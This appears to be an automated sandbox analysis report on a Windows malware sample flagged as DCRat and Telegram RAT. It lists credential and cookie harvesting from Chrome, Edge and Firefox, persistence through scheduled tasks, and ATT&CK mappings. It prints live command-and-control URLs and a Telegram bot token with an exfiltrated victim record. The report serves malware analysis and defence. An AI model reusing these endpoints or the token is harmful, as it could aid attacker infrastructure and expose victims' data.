              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeQueries volume information: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe VolumeInformation
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0010D5D4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FACF5 GetVersionExW,0_2_000FACF5
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information

              barindex
              Yara detected DCRat
              Source: Yara matchFile source: 00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.1886936604.00000000026BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.1893402647.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1803403382.000000001306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: System.exe PID: 3604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 2944, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 1704, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 5324, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Telegram RAT
              Source: Yara matchFile source: 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Recovery\Idle.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior

              Remote Access Functionality

              barindex
              Yara detected DCRat
              Source: Yara matchFile source: 00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.1886936604.00000000026BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.1893402647.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1803403382.000000001306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: System.exe PID: 3604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 2944, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 1704, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lmXqPxTfNHomnnafzTOKZnFns.exe PID: 5324, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Telegram RAT
              Source: Yara matchFile source: 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts241
              Windows Management Instrumentation              		11
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		2
              Windows Service              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		2
              Windows Service              		12
              Process Injection              		4
              Obfuscated Files or Information              		Security Account Manager157
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		3
              Software Packing              		NTDS371
              Security Software Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets2
              Process Discovery              		SSHKeylogging14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts133
              Masquerading              		Cached Domain Credentials261
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589210 Sample: 6uPVRnocVS.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 52 api.telegram.org 2->52 54 monrul3t.beget.tech 2->54 56 ipinfo.io 2->56 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Antivirus detection for URL or domain 2->68 72 12 other signatures 2->72 10 6uPVRnocVS.exe 3 8 2->10         started        13 Idle.exe 23 34 2->13         started        17 Idle.exe 2->17         started        19 2 other processes 2->19 signatures3 70 Uses the Telegram API (likely for C&C communication) 52->70 process4 dnsIp5 40 C:\ProgramData\ssh\System.exe, PE32 10->40 dropped 42 C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe, data 10->42 dropped 21 wscript.exe 1 10->21         started        58 monrul3t.beget.tech 5.101.152.15, 51288, 53636, 53642 BEGET-ASRU Russian Federation 13->58 60 api.telegram.org 149.154.167.220, 443, 53641 TELEGRAMRU United Kingdom 13->60 62 ipinfo.io 34.117.59.81, 443, 53639 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 13->62 84 Antivirus detection for dropped file 13->84 86 Multi AV Scanner detection for dropped file 13->86 88 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->88 90 3 other signatures 13->90 file6 signatures7 process8 signatures9 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->74 24 cmd.exe 1 21->24         started        process10 process11 26 System.exe 3 28 24->26         started        30 conhost.exe 24->30         started        file12 44 C:\Windows\...\lmXqPxTfNHomnnafzTOKZnFns.exe, PE32 26->44 dropped 46 C:\Windows\...\WinStore.App.exe, PE32 26->46 dropped 48 C:\Users\...\lmXqPxTfNHomnnafzTOKZnFns.exe, PE32 26->48 dropped 50 9 other malicious files 26->50 dropped 76 Antivirus detection for dropped file 26->76 78 Multi AV Scanner detection for dropped file 26->78 80 Machine Learning detection for dropped file 26->80 82 3 other signatures 26->82 32 schtasks.exe 26->32         started        34 schtasks.exe 26->34         started        36 schtasks.exe 26->36         started        38 28 other processes 26->38 signatures13 process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              6uPVRnocVS.exe65%VirustotalBrowse
              6uPVRnocVS.exe71%ReversingLabsByteCode-MSIL.Trojan.Uztuby
              6uPVRnocVS.exe100%AviraVBS/Runner.VPG
              6uPVRnocVS.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\Windows\LiveKernelReports\WinStore.App.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe100%AviraVBS/Runner.VPG
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
              C:\ProgramData\ssh\System.exe100%AviraHEUR/AGEN.1323984
              C:\Recovery\upfc.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\Recovery\Idle.exe100%AviraHEUR/AGEN.1323984
              C:\Users\user\AppData\Local\Temp\e65pqCzUjZ.bat100%AviraBAT/Delbat.C
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Windows\LiveKernelReports\WinStore.App.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe100%Joe Sandbox ML
              C:\ProgramData\ssh\System.exe100%Joe Sandbox ML
              C:\Recovery\upfc.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Recovery\Idle.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe100%Joe Sandbox ML
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\ProgramData\ssh\System.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Recovery\Idle.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Recovery\upfc.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Windows\LiveKernelReports\WinStore.App.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
              C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe81%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://ns.adobe.hotosh#n0%Avira URL Cloudsafe
              http://monrul3t.beget.tech/c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd100%Avira URL Cloudmalware
              http://monrul3t.beget.tech/100%Avira URL Cloudmalware
              http://ns.adobe.c.0/ti0%Avira URL Cloudsafe
              http://ns.a.0/sTy#n0%Avira URL Cloudsafe
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Zt100%Avira URL Cloudmalware
              http://ns.photo/#n0%Avira URL Cloudsafe
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N100%Avira URL Cloudmalware
              http://monrul3t.beget.tech100%Avira URL Cloudmalware
              http://ns.adoraw-se#n0%Avira URL Cloudsafe
              http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              monrul3t.beget.tech
              		5.101.152.15
              		truetrue
                		unknown
                ipinfo.io
                		34.117.59.81
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2Ntrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://api.telegram.org/bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exefalse
                      		high
                      https://ipinfo.io/jsonfalse
                        		high
                        http://monrul3t.beget.tech/c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgdtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3Wtrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabIdle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                          		high
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFIdle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=ZtIdle.exe, 0000001E.00000002.4123458318.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://duckduckgo.com/ac/?q=Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                              		high
                              https://ipinfo.io/jsonxIdle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ns.adobe.c.0/tiIdle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoIdle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                  		high
                                  http://ns.photo/#nIdle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.org/botIdle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                      		high
                                      http://monrul3t.beget.tech/Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drfalse
                                        		high
                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Idle.exe, 0000001E.00000002.4141030211.0000000012B8D000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012AE8000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drfalse
                                          		high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Idle.exe, 0000001E.00000002.4141030211.0000000012B8D000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012AE8000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drfalse
                                            		high
